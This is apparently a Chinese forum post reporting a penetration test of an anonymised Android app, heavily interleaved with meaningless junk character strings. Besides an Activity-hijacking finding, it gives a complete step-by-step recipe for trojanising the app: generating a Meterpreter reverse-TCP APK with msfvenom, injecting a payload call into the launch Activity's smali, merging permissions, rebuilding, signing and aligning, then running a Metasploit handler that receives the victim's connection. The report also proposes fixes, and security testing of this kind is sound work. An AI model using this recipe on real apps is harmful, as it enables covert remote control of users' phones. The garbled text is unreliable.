& s5 h/ z6 J. ~, h4 B- c2 z1 O 8 X; H8 O. m: c" @

' `1 w% N g! r" }, S' S" p& t' ^ % ] ^* A$ \ }8 s: l) ^ O5 _, n   " P9 P B7 T- Q% X: @ 6 \. I3 ^/ P) J( F0 J

! L; d/ m- V ?& O# r# Q0 t3 E & Q0 x8 _# E7 {( K, c% v# d8 y

/ g! u3 U: U8 R6 u3 |1 R: K- C 3 ^* m3 H# u; n% d* m3 \ 1-2 测试结果 + l8 Z0 {! j" K, f0 M+ r b2 p W! z! a0 _) B

; d) o C1 h h5 x + n" l) S6 _; v1 P8 h2 V2 K! C7 [

! o6 j6 [. U- o . [8 L" |: f/ n% g9 h2 M! z   3 h7 U2 H- @1 \( I+ _5 P 5 S+ F5 y1 _. v+ ?, D

+ D, a C& w( e+ A' c9 H0 Z& X! X2 N5 p u4 x7 O8 m6 Q

0 f2 l* X) f3 I0 ]8 g: D4 p8 B! z, f3 S 2 检测结果                    ' |* S% F9 P! ?: B, M. a3 b" C P& r- Y% U8 W1 s

2 M' ^- a: W3 d0 ]& I. `8 ~# P; R - A; d* k1 i0 f& ^

A4 g- h8 [4 A# M , }* I8 D1 `; w( N t, e. l. B 2.1 某某某 7 U; S; Z7 w( ?, H* L5 ? - f0 K- g( B0 ~0 K$ x2 V

! M2 a* P/ X' J: Q , {1 C [ J( t: @

R7 R, ^3 _& C; j1 ^) I% A- b1 U, R4 @ l% T" \' F H 2.1.1检测目标 ; Q2 o6 T$ `# d$ R. H h / n4 o8 ^ I- ]. O. Z- |

h# ^* F5 E+ ~/ R. J & E+ {& A- M* Q( _ j0 d. A

V, D1 g/ V1 B ) ~; ~$ w- ]$ {6 q 目标地址: 某某某某某某APP 0 _$ s# @1 ^6 h& s. V : O. C' r& p& |* f! ?4 G

1 m/ E5 D2 Y" m; a+ @ 2 k) ?. d$ l% a

) r5 G8 t6 E* W- _# L' s/ B, L: v A: d+ U% w/ d 2.1.2检测结果 ! H% [% U T6 l6 S# L. D ) p3 F/ m9 R" c O, p, L+ [: c( P

6 k, j$ E6 u; j Q5 D' ~ ?2 d/ U- L' g5 w0 l$ s

7 n! k5 Q$ W# p- T, U! {& M( \" ^- I$ ~ 2.1.2.1 0 N" g- }$ @& ?1 g% Q 8 T% L5 [0 p2 s k( R* {

: g7 ~3 t: L/ O" a6 w4 H, f ! z8 v- G' D$ G* m: u3 e, Y

( D2 D" i1 O% y3 j # t7 d, G. ~& @% D 漏洞链接地址:某某某某某某APP 3 {- c- g! z w9 ]$ r1 `$ W1 y x' {0 B0 O ?4 G T

+ D* e7 X$ p$ W$ U; G# H 2 R9 L: R' Q5 f: W) ^+ r- c( j

* u1 Z) c: R! N# A& [, [% w- W & a( @( B" K, f* v   X [7 V4 Z0 e. ]( i0 A3 N ( D' C% E2 O* i, _! S/ F

5 A' ~. Y* H' |7 O: g7 Y . q, u/ r7 G& e

8 ~) [) e" q: ^+ ^- K 8 G. S& `4 Z, U. c# F. h2 A 漏洞分析及取证: 8 ]+ n: u0 L6 @% ^# S8 J! u, o ) D2 O3 ]# z' m) o$ h: \

8 n" n" z9 S# `+ x& K6 l$ X% Z- ], E# D' C( ?6 ~0 y

0 b9 P$ g2 K& y # v2 m u* g& [+ V& `4 K                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: 2 T8 Z7 i5 B! Z0 i # O8 M. j6 z9 G) y/ `) P! [

- X" W$ }/ l D 6 R9 l& m8 k: w+ _$ H

" J- l# b! I, p8 Y3 U! c. Q . l! b1 ~! A$ q _( `' Q _" D6 k! _      , r* k" B! P) P0 p. D" v4 K # B5 I% ]+ C1 X+ S

0 h4 h- c2 A% j J- Q# U( k+ D6 {4 |) S9 a- C* Z7 B

: X K( ?- j; z; E( n 9 D% U, w" O! }7 U& }- V                       + g% J, g. @2 o; F! k9 O+ i/ O5 V; ^# I; t) r2 i9 ?

# W, ?3 S6 m2 q8 V; H1 a, A* m) f" q# p% m' T a

& [" X+ A3 L; @+ \* ?: ^2 _ & i, B+ j; H+ d( y6 @ 7 M3 X* X- t9 d 7 o3 h+ }3 \1 f/ \$ b) p3 P

' @ V# Q% X) V4 _; N/ o; }* C$ ` 5 |" X. Q% U, L3 q* ]- P

0 w: w; Y2 t( {% L: b0 A8 p7 f6 K0 K2 N % F3 ^4 R t" ` T* L) E, Y* M6 P ! s1 {( N. E% D( q4 O J

p1 ]9 y1 ]( l& m9 [ \' E/ P1 W8 b/ k" c9 p

/ D2 ` t! R1 f; x4 \4 d6 H& K ) O! j( o% ^2 N* t6 _1 ?8 Z : F, M2 F7 c! O& ]) l/ d, N+ x 9 J' q: l% z) c0 F

* `6 l, b+ H" {1 H& a* t + C$ @+ H" ^) v8 l& Y* A7 `

& N6 ^& L7 B6 R" c+ p % f4 P& [4 I2 [, d6 M 漏洞危害:高 - ], M& m4 d; |# I# y# n ! j- x, [) e+ Q' s; a/ h& G

" i+ \/ X# {/ w- f9 ?+ |# ` * T+ t. V. A; S, c9 N
; |3 h5 A1 ]) K" x $ y S$ T+ }% D6 _' p2 P & J' ]2 o0 w% t0 I! G: a4 g: B, I: i8 x% H9 T; ~' c5 V5 x, [4 w" {' ?& N% V- |4 L$ O- k/ a8 E+ b+ z. b. X: ~" u0 q# T' p3 i4 a9 W, P. e) {/ }/ g2 n- h: c; Y z/ M! J, n) h/ k# s; k4 b; ?/ A. c3 l8 `$ G4 w% r4 L" w3 c/ T6 Z" h; o; U H3 i+ j2 R8 r8 g- l2 I# [; n+ [ ~: V" t6 _/ d9 R3 t' H: p) ?# _( d. i Q8 Z% @) l8 u7 |& X; D$ a3 ~. V9 w6 i/ h5 M4 h2 J! T" a5 x j- J! ^1 g8 }$ b. n8 D/ @% E3 o+ K( o& J" A; ?! W( Z: L/ o, t; [: H7 H9 }. I/ a9 y$ m/ v% H) v+ p2 r$ @$ w+ A$ z0 [/ O! x8 j) V/ L3 Z# O& {& P6 i- ~, h2 n7 m, ~6 x( x& m- `# ?" D- S6 T% s/ Y% x/ C8 |0 Q' u- K( h9 H1 x6 F. B. Y& G8 k9 s
3 H- i6 {0 _; ?: O2 \ % K, {- g9 T* m+ x( A5 T

/ N3 N* _; K I, A4 H! o6 E8 n 1 Z+ w9 T* }: P$ b% t 严重程度 ( ^- F( H: x+ l: o- G' R0 D, k7 o% F1 S+ s5 W+ m# _6 v

% h3 T. X8 X# O1 L7 K; b! b # P0 |4 V$ O1 c9 f/ A2 l. s
* Y$ N& K# p; \, \! N# q/ i! S z8 b

& \% I5 U" F7 b) g0 _! Y7 J1 _2 o' U* z6 V% H+ R( ^4 K ; M& I l( H, s+ N: O* ~ 8 i( C9 k/ |, L! A, j% [

" g! z' x: q$ D* {8 i" s) ` * D% c3 F$ Y6 ^/ E' h
9 a/ k z2 u; k8 J4 `. x: |. c % s4 K! C. o1 R8 K1 O! V

3 L! W [* I/ N5 c6 Z0 H: B ' i6 T$ p# \' t9 s + f, N. t" l$ n" K5 ? L 4 b, ?/ \6 R" v8 F, ^1 ?( ~( ^

- |. w6 D( s3 P( v* }8 l ' [* H, ]9 L; f# j' C& I$ h: }. J
9 p; W5 } g+ ` 6 p1 f- N" G9 Z2 c

6 A2 Y& F! A/ S+ }0 K1 W/ z# F. q( y; H: w# q; o" u1 Q ) b9 W3 i5 [, A 6 v2 R6 ^( L9 P Q1 g H

+ j3 F% ^7 J# y0 Y) G 3 f$ n* O; |- H, i+ f
- R' O2 I0 m: r3 A, L* e 3 ] Q' a2 |( t/ R1 c, H

! K8 V3 a4 k8 U1 C% g 1 Z7 _, B9 G& }# D2 {   % L) i: e6 w) j" f# r * U& g1 N- F+ ^1 R3 m. c

8 V7 E, Q1 m' }2 {# { - e% L4 a3 ] B T- J9 [' k
0 [2 ?$ S5 A* p 7 T* X4 [7 G, N/ C8 Q

( X/ C0 b1 T; w. I $ f: H; ]9 J$ f* c9 z : ~2 }/ A+ O* v : a4 K: @3 d' K+ c4 F) Q. [

% S7 T* ~& C7 s- P ' u7 A1 f; @ l9 O' I' d9 u
; u* c1 X" H! {$ C" N % x0 i# h' H, {/ D }

+ f) Q' v" U: D' B " I W) Q( b, E. X   + d3 z2 ~# t q( m: q. |$ x & e1 |; J0 K7 v# ~/ \

8 X$ Q" c+ F, D" J1 J8 s4 Q; x$ c3 A _
( n. S1 _" j" x& P& D 0 E9 b+ a: y: R/ n/ E
, ?. N* x; Z6 m, N 4 P% v9 T: T+ ?4 a9 |# l

{: w& j; j5 D- n$ T! d6 W1 l- ^ # o; P0 v* q9 z' U# ~( h   ' k3 D- q( v0 }% S( \- R) |# ^/ w# D3 ?; C) T; `* F

) w# Z" C* v% O. \6 U) O* F A2 ?) x$ J3 S& u6 r4 i1 Y

- Y# L8 \( P( C # d9 E2 o# ]3 |* M3 u 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 8 E( E" C! n1 D' x6 V& _ e' ? : N+ W+ ~5 N, u" e# X! j

2 k) r t" u- d- n7 p7 i 1 i! a# U+ t; }; o

6 A* n! P, \* Y' w % L, I3 y7 Q8 m           ! R' v/ W" R2 t* B% i1 B" _, W/ M4 K9 t6 h& F

( F" m/ O+ m$ h- j5 v7 N- S: d1 q

- M* i, n6 B# E7 Y5 S: j / Z7 j, l5 B- z- c6 D/ I$ W   2 l7 v1 Z# i, ?; L- V6 F t* P2 H8 N/ V2 ~4 U- l

; ^% C, o( J$ G1 a0 ? c+ I$ y2 J. m y0 o I' t4 p

7 ^. B' w- H0 h/ g " \/ P1 X6 Z0 P* ^ 2.1.2.2 ( P$ b. E2 n6 o3 O6 p& C+ S 9 B+ L$ `( N+ k6 U

( ^9 D+ {' D! I6 x4 a/ a g/ ? ! ]+ Y% U' M- ?* z; I4 K$ _: K

/ _) P- ~4 Q h; |$ q3 J# ^6 n 4 Y) ]: j. j: X0 ^' ]3 K+ w2 ] 漏洞链接地址:某某某某某某APP - d, {$ d9 m3 z7 d ) v& V$ B! ]' z& s; k

& h' I8 c/ R, N- b& M# e 4 q) Z0 }- c2 S8 r

0 b( g- T, T0 l# l. Y ! J% _" H4 O3 O$ I! t, ?; \) o7 s 漏洞分析及取证: 6 P0 ^/ X4 z% ]9 j; v 0 f! q9 N, V* C6 O l- s

. H6 H% r# o: _8 P# W ; Z" L* U9 H! [' ?- o

# k% K$ L& R' q . U; w- q- L0 r I! J6 S                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: * Z+ M4 N0 l% ~ & ?- o7 y* s# q) r

8 d. w3 ] d F2 G6 a, v6 B & y% Q2 o, p, a3 ~

6 Q+ c/ R5 H; v; n2 V4 E+ ? . b" L& P+ m# v; a& i Metasploit 生成木马 apk & d* U5 f) {8 _* J* T" _ * g M' c6 f7 t( V! b

) \* W% B }, [5 X / r; J3 f; Y8 l- `

% x6 {" p6 K( ]- [1 R 3 r$ |5 E) s! V4 K# g. O msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk 5 C; [( F5 f( a: a+ ]1 U / h0 x/ m$ G0 a. M1 }

: ?; @% L7 E: o' ^ * h) {3 w7 K5 O- x" w" A- y

) _. l6 E8 j0 Y- ?- `" L - Z6 }$ l% G6 u) D/ |" m 反编译目标apk和木马apk $ l. A9 l) V) X$ s . [/ G7 W; a* j

( ~6 z+ H$ Z5 n7 W . @; I8 ]7 x' ]) p4 J- L7 b1 M

0 m7 A. ^! b5 U i) W6 q ! }3 m8 C: Q2 u, X apktool d target.apk
% O4 s" g+ E! b Y) h: x1 J( M5 H; b0 j2 P apktool d cockhorse.apk
+ ]" L9 ?+ p& ?+ V/ ^: a& |1 b# C T' F( x5 q( t+ z. t0 q

5 @8 h: q7 Z5 `+ ^ ) R" \6 P) [$ }( Q j

( f9 a; `' D5 R( }2 S & |0 X" e, H" L/ `) D- Q; S4 M 木马 apk 注入目标 apk & i6 f7 }/ f6 { ' j) A- ~8 H0 G0 d

' p: _. t7 W+ @9 A3 ?2 u6 u& v/ j- |' F5 v5 Q2 ^. E7 f/ F# u

: ~; V0 x, m* v! m9 m$ h9 P 2 i: P; ~0 M% f! c' A 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
- B6 W5 R! q& G! ]$ d $ L& t: v7 I) ?6 Y) H5 [. a, ? invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
5 _# \; R. c* X6 G 0 i6 W" y2 P, n1 K" j: S

) a; w, i; c- C `) C1 z* T: R4 e& @8 ^

2 w: T' d' h% Y8 g " b4 s; Z) S! A# q) J- X 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 9 p: Q- a% K6 F! Z5 c( ~3 G" A3 I; o0 Y4 C' w

# l. ~# d* O/ T6 r1 D* v ' n- ]2 j3 y0 b" @

& t2 b. ~! {. e# V6 ?1 J* E9 z " _- D+ E3 s7 p4 g0 | 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 9 Q& e' g N5 s$ S% E& g3 B ) d y9 q% B1 ^3 ]$ m# j

2 H; ?' v( p' \ T z& K) r- m& d* e& q: r+ Q+ |

" u3 _; _$ G: M) ~9 U. _ ! D) [( ^) D$ i# p3 P0 h 回编译生成最终 apk ! g& t- t ^& V, [. _+ j7 q: s/ M9 q! f+ i a9 S4 O! Y$ z( ^

6 F; h6 Q1 A( U4 d ; M% G; v% z) r6 ~

/ x3 k4 x% f: J/ D* J0 b- W+ ^6 o, c4 X) h+ w, D0 O- \ 重新打包 2 |4 e$ Q4 S6 z9 K: x! w3 U& w1 J; q ' U/ f, G0 |7 ^3 {) G7 f

9 L/ x3 w N0 `% i3 ?, T: I& ~; W

6 Z- ?9 J: w; ]) C( I7 r# L % n' \1 G0 y$ E% J apktool b -o repackage.apk target_app_floder / t7 L- D1 o& x* E1 Q1 F6 x. I& x& \5 ?

, z. y& h& V& G: I* G; p( _ : D! P8 F0 z0 x# H3 u5 |

$ A4 e- e1 l* W x: D$ s. g! ], W6 j8 \& P7 Z/ H8 D' \. w 创建签名文件,有的话可忽略此步骤 6 P, s0 n0 B; K1 Z8 H. F7 F8 W ( ~ B1 T( r7 n. p& W! B+ ]

/ g: J. Q1 M, p' q; c7 }0 p+ q 4 O. ^3 v- ^; W9 F; i- j. |3 Q

6 l6 m# e/ h- ~# Q( E8 a$ z 1 Z3 [* a6 }. S2 M keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                . R' P0 \: C8 ]* s; U* C, T& } H " O8 N( i9 J9 q4 e

! z/ ^! _7 @7 n7 [/ |( {) y1 t% t5 e ! ~8 E8 z" F7 [5 R6 z: Y9 b

% h* j1 M" x8 l5 T# g6 X* K ^; T; R) b5 _ v5 V 签名,以下任选其一 - P8 s/ X& o/ N0 V% M s5 P" y) Q- o% n

Y, u+ P3 m o4 L8 z+ X; K7 ]' |; V

5 }( t' [' h+ \ E0 S' ~* A/ {6 i$ O g jarsigner 方式 p6 ^( S9 Y0 ~ [* L, P 2 E& z0 ^* ]" c1 A {3 J, i

/ s8 \4 R( S0 W" N* X2 E % B8 J8 I$ a' {3 ~( t1 s7 \

1 K7 g" A0 w2 ]; @ 2 o9 y4 V% x- d$ y jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname ) J. W- {* h( E + U4 Z" u, }4 T- Z

" ~% h$ Y5 L8 j( `+ X4 e) S ' [# z& O7 @& D7 k" J& w

$ s" \, D1 Z B$ i/ Y: X5 Q! k5 W7 ]/ z7 J5 E% ] apksigner 方式 2 [1 p/ h6 n8 A2 P / j2 K$ {, O$ ]( y2 Q& z" l+ h

L/ S( s+ [4 N! s+ I9 k4 x2 f" e }

% m' U e( r6 ?9 R6 H7 g4 F* J + V6 S$ n; _2 o6 P apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk ' f u, @ z" ?: ` 3 V5 r) {0 G6 h1 O) w, d( o

- k9 H7 o( ~& |9 c. p* O m8 o3 M ) ^1 W% y. R: E# K* Q

9 P% `, s6 s5 \; h8 S 0 D4 `' K9 Y/ ?: V0 w" v2 k* [ 如需要禁用 v2签名 添加选项--v2-signing-enabled false 4 H9 f( Z) `( F, |* { - E* y- f# U' X/ N$ J7 F

& C3 H z& }$ u# d( J3 k5 }6 i 9 P$ w/ p: D* H. M T8 r3 X; Y: C7 t

1 w: k' }+ y7 O$ L$ n) b J & I! _2 j$ e, N) S. \ 验证,以下任选其一 0 Q. P( G2 F# G , W, {8 I- m& H( G* H7 Y; A& M

, b% q) }7 Q+ |( x, B+ M) H: W: d3 X d% Q, [" r# x3 S1 H

4 b8 i, N. \( T' H- H& [% }3 y; a% m" R+ u! O' w+ ?/ S+ f jarsigner方式 4 v" R3 \; U% `6 @ " J7 O. r) x$ A! {

( {) @$ z# a+ @) T$ K+ r, s 8 h4 k1 o% u7 ?3 u- t0 C

/ f7 J' h# @' s: O! o1 ]! Q' } 7 l! w3 o! n# N7 i; ^ jarsigner -verify repackaged.apk 1 r0 ^$ c- z2 T( K% ]% k- a' A4 C0 m) D& {% Q' S' ?7 R* E" ^, O# y

2 Q1 X9 M& n. Q/ N* z2 x" v$ R / y4 b" [' W9 g3 R

: C/ q2 E; y2 z$ K i7 c1 w" `; V# ^6 |! F! g: P/ ` apksigner 方式 / w* G3 \3 h7 L, F% @ # ?9 [1 _, |8 H( D; z$ t, {

# u8 K! M4 }1 a3 d7 d; ~9 n. [9 ` 7 z2 w$ T7 b2 o

9 r: I0 i, p3 v: x$ E& h! |" T9 l( N3 [( O8 J, j: c$ I apksigner verify -v --print-certs repackaged.apk . B! t; V) O5 ` 7 b4 Z$ x" \* R. w8 D- V# ]+ M& d

/ P+ [9 C2 u# p5 P7 q- M9 N & ^" B m9 ?4 }8 E, V9 ?7 }

8 H3 k4 G3 E, G$ H4 H$ f ' ~, s* l! B: s0 d0 G. R keytool方式 1 G8 M8 P% X: t( p - |6 n8 \# Y- r, |6 F

! Q) Q/ @, ]9 x6 p# F! E0 ? & i+ J! p4 y. u* W; q( G. o

! f* {+ l! F& ^( _ % N0 Y, ?; n; d/ l/ ? keytool -printcert -jarfile repackaged.apk 5 r/ L7 Y+ E- l8 I: Z6 B. T. }( g6 c

. A6 Y+ k) A/ c, X7 f' j% G2 B9 ]2 x& J/ }

) s( @3 D! i) s7 V( P 2 e- |7 s7 q& f4 [, }. G6 n, ^ 对齐 . M- w7 J# [8 h2 H / @$ {. C7 ]4 ?3 Q# s: s; }

" E9 C: K5 g6 o+ h5 q) X" F 8 H& E9 a6 H- \- d; P6 J0 D7 w

" E. z2 Y& N6 s ' e% m5 w5 k5 l4 R 字节对齐优化 , p/ p9 {/ }: f8 b Q" t" b. w V

+ ]" r- n% k* g3 a1 }4 e n8 j 5 F$ q3 N# m$ f: D6 X+ U

$ ]# w/ f& Z! K( y) r/ V9 U0 Z / v y3 L6 q0 }' O4 l4 k zipalign -v 4 repackaged.apk final.apk ' Y) [! L' j$ O O( A. ?# M+ \ 3 N. [+ i! Z% U5 s0 X

6 m2 c$ {5 N0 ?3 U# r3 t6 f5 Y0 k( l

w' N$ ?1 B- h3 n3 Q1 _* w. H( c% d8 o2 K, ^. Z6 X 检查是否对齐 $ P9 m# h i" J6 M( c+ x+ s) {% @9 { 3 b6 G* W: y; J% j

& [# T! } ], s) O8 z 4 u7 P2 Q2 `$ z* |1 ^* K. H# |

9 L) r6 i: t) v7 |$ ? 8 t+ y& V' V% A) r1 }1 w" e zipalign -c -v 4 final.apk & A* Z V5 }/ C: f & ]" |' f6 b5 i/ Y) x

" `- i! D3 }+ o+ k ) Z" }7 ?% J6 g

# G0 a5 a) f* D6 T + F- d5 \4 ~/ Z2 Q 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 + l8 r7 j; @8 Q. N, u- c( Z6 ^! \0 g# o( D- t; B

. ^5 `. G4 V2 t W- G* P. i 5 A8 R& H# e: L3 i

) C* _) C: ^: S4 H& M . T2 j6 U; o& v1 n0 V1 g/ Z7 U 启动Metasploit控制台,配置参数等待上线 . R2 B: _+ F6 d8 s 4 _4 ~* Q p2 ^9 P

! y% b) b" |- ?% t. [/ F. S' a- { . i; o e/ F9 {2 e2 w

& w* Z; X! u1 ^ & H0 D& {! \# z5 _* ?& P 在终端依次输入如下命令 4 I1 y c- G+ f6 y9 L ! ~- v; B- _5 Q

* q- O/ L4 o9 l' h1 a 7 J! m( S4 n$ w0 S1 d* a, p

5 Q1 z7 A2 E: F/ @ ( M {9 W; e" H+ | msfconsole 8 M; r8 u5 O6 f7 W, @- X- R L2 P' d! l, M8 P2 M W' c

6 ~. k4 `. T" V% x) b/ R8 N & ?- ~7 E" \/ j3 W

, f6 r0 _. g2 `4 f& r0 T5 e4 S" I6 V1 d' `* j, W use exploit/multi/handler / O% G0 k8 ^3 @' t5 Q$ ^3 Y- E% Y8 Q4 p& g6 Z. l% c0 U2 `

?$ K6 ]* x' m& `0 T; {8 v4 P, g . y1 a9 j$ a& I% _

6 H2 o4 x* u5 u& d* o: v$ @( T1 K o3 k) Y; w set PAYLOAD android/meterpreter/reverse_tcp 8 U7 g1 q% t/ u0 i' P s* x+ u 9 x$ T$ E7 O1 t' Y- ^( b: D$ C

8 q. T" K {, D# E / l) \' J. ~' q8 } h

5 n) K" M* }) d1 p, y/ |+ L ! H1 R; ~7 N+ x set LHOST 192.xxx.xx.xx & f/ f. |# T4 _6 j( |; P+ ] * G5 _6 y# L7 r/ Q8 t" U' C

% y( n0 p, \2 D3 p, J* @0 O$ ~ 0 G6 Z2 J+ U) E

$ I/ t+ l: |# n# B& H$ a& k9 @' P: C) p: d% b$ L set LPORT 4444 : K7 H& q7 {; u& H 8 m7 N' B- @4 ?1 m6 ^' c, u

0 l3 i4 G3 t- L' _ % K% o: l. M4 Z5 }) I

" n) [5 ^/ o- U1 \ + P, A4 p) ?% _8 Y" Z exploit B% o8 e- V$ J7 k. k2 @& P X3 D4 O7 a4 m4 j) j/ n

6 i+ H3 g7 L) o7 A 3 H2 n- o% x9 G' Z

# C) b4 o2 f# m4 ~: n, o 6 |4 V+ @# D7 c% v& s' B 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               ' ^; o, p. ]6 w& j% y, Z$ L $ E. M" }4 a# U5 t! ^* Q

: o6 K( w; B; W ; z6 Q m% o1 a4 x4 m$ E0 U0 k. O

0 i4 W/ a! V4 r2 {0 p+ y$ M) z& B" k/ j 4 C! r; s& S; j6 B( F3 ~ 漏洞危害:中 7 ^4 _ ~8 l, K2 d* c; l' P " l8 o* _# f2 n4 s1 F

0 H5 @3 |$ [1 T, ~. [ , C" M5 j) x2 ~7 S3 S7 B
& o0 E( e& |0 b2 p5 ] / `* x4 J" @7 Z& h. w9 T$ D & ?6 ]) G0 A' w: h E. j4 t - q! U* p/ m4 {8 u8 `3 @ 1 s+ v* Z5 j9 `5 _- R9 w- b. u% v- V v! e* K$ x& _5 w/ ^1 b \4 p! @& |: I: C3 v7 N( a. F' K: \: }2 U6 Q3 y4 x5 U9 [" N/ [" G, u5 b/ x- T+ g# y1 a# J |* \4 ?. @7 K" \* p9 B& q. _9 ?* c: p4 h E) K. `+ D+ s: D8 h" F8 i" M- A0 M$ M& |0 |8 [* K W1 ^; ^# o7 u5 ~* L" F/ J9 _$ A2 B8 _' u% d6 ^5 W' y, {) U" _% H6 O6 I5 _( C/ q! M: B1 T$ R2 }2 `" Y6 n y) U& G4 y* a2 ?( K# s7 `4 g& p! m x: e& V) H& Y9 N8 _5 i& \5 D/ x* W: N( x/ c" g% W( Y9 E2 n0 J/ N' }5 a3 H, w/ l; Z! p1 w) s4 m; K7 w' [5 T' b$ n; L9 J9 G% i% S2 u7 a$ A! K, B; y- {3 L' A; Y% X. A4 @- ], L/ ?( \$ L1 f# a
0 f# F1 @; W) U8 p H* [8 B 5 d+ C% @ t; k' L, d- y

& W. T: H- \1 J0 G9 ]* T8 m3 }2 g: w3 k; q6 T 严重程度 . P0 e$ H5 {9 F# h 5 `" k: N% m9 E9 r. P1 {. c

2 @! v3 u8 j) l , T* j, r. }1 }, j) V- q: N# _
* J0 p: H1 N0 U3 i& J* @ . ^# r6 D& h- f2 V( X

; r2 N6 `% R6 E7 W1 k. p1 R 7 Q1 b$ Z/ S2 G" ~ ^2 ~ ! z# N( {; q2 n2 Y: X) b& B% {% M& `7 X9 q, [

& v3 [% A v; w q 6 R2 v+ f6 n8 E1 C
, N7 Q$ U' R( P9 n @6 l8 l/ a! v! o/ o% I! C, t, O1 q3 O# r, j

' B' _* P) w. }) `) U 3 o" N$ @4 `0 z* T # v# H1 K" z1 C& s , O Z1 d$ e# L) j& c7 O

. Y2 |" X- t4 L p X3 A, e+ r; g: ~' b( ~
0 l( K/ P7 }' @! _$ i' E ( X/ N' l% f8 m, S' g0 `

' I" B6 q) O9 w( x! D, c" ?1 p. y0 u 8 {. }+ `. D( v: b7 T5 u# R & b' H; i1 K% ?2 F8 P 6 t) K; L$ [2 s0 N

/ F2 u; M6 M Y/ [: F6 A: [; k' O" U; h
( F+ n; V5 m7 O& m6 @* |3 ] + R- Y5 Z& X# U9 Q . f" [$ @+ {/ G- m 3 I6 L' W# u& f: w* V; [$ i/ k

% C8 z" u; \" g& y: T, z 8 X7 D! N* D$ J4 Y$ o   2 e+ \) R. G' G8 j9 U3 Z0 L, @7 s4 |; F" i

( N5 ] B! m: T+ g5 N/ @3 e # [" j8 X; ^- q/ e. ^3 B3 g' P
# t1 C4 E( ?( J- d6 k5 [2 L4 a# g' V; H

6 M4 t( j2 D- f+ e5 {, C : X r% Q- S1 B/ X e$ L # C- @) [2 S; U# C1 W& t R2 _. f, L: h0 p# \9 T

) {2 t8 I7 g' G R( I" \6 l0 x3 [" K8 [4 F
+ Q1 S( p+ O/ J9 Z8 z- D1 U7 D# _ e0 f) k, u8 H1 d3 {- V) N M* W: k3 x' V2 h; t3 V, P9 s q5 a 7 F `5 p" }- [ Y

+ |+ l( O' U- P: y8 ^ $ ]! E! _: W" P! B6 J" V7 G- l   $ R7 s i5 t/ z" `& V& M% P1 L7 s2 G A

' l, z) S' N/ m% L r& W2 D2 s- V4 q / {( e8 o6 `. ^+ B$ h8 T# \" Q+ \1 A
/ C3 x, v) d r7 ?8 n% L5 ~6 Q8 ]/ ]- ? k
5 D+ X9 C3 o7 Z) Q8 P$ f: c" H1 x q 5 C$ g, `. `; k0 O

; g5 a/ ?" s$ W1 B% i3 { p6 n: U$ v) L/ H& m+ L1 v   5 z( H/ ~6 ~* {0 Z" k 8 F* s+ g( l `; r4 j! U# M0 z$ i7 v

0 q7 b6 e8 N f9 S2 d7 _/ C 4 |7 A, q/ I$ w8 M4 U

# ~6 \; _5 _4 s; c/ s6 J$ X" r0 O0 r* V. S$ Q, a$ z$ X 修复方法: / e. t7 d3 B! f6 x0 x5 J- d( b1 j , C1 E& Y# m# P4 {$ n

- W e9 _7 e% ]2 L: v, y1 B, s+ C J

$ Q6 n0 k: o5 D- E5 G) B 1 v$ C7 `0 w/ |+ q- ]' F               1. APP 启动时应做签名校验防止二次打包。
' q. ~) v% D. q4 q ( Z- I: a3 Q i* v1 i 2.
建议采用客户端、通信和服务器端联动防御方案进行安全防御。 & t+ B) X! H6 E0 \" e' V 5 U c7 D: B, Z) a. L

, k2 K! E5 l/ s7 g* [' [$ h" s2 b- \: i; e 6 ~9 J$ G% m7 X, ], h ' H2 {( L3 W" V. l( {

- U2 n' z6 X$ Q0 [% [9 k" a/ | 2 w5 Y5 v( y0 o7 F   ! ^& {; q8 M1 Y+ [1 E7 ] 6 k# ^$ {+ O. _' T4 ?

$ l# ^$ j& a1 I8 F4 X- `+ k 0 m6 v) T: M# l. q% e1 [ ' G# x: q+ F; k) F d1 r; _+ v! n3 A/ | e% A

1 r! I! X+ _; T0 ~* n ; }/ L9 }- }7 A- F' @
: X! G3 q% R2 K* H ! u+ T; R; Q( u7 F

+ w. s0 G) u. K8 _ w4 R f ) X h1 q- @9 F# W$ T4 _( X
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表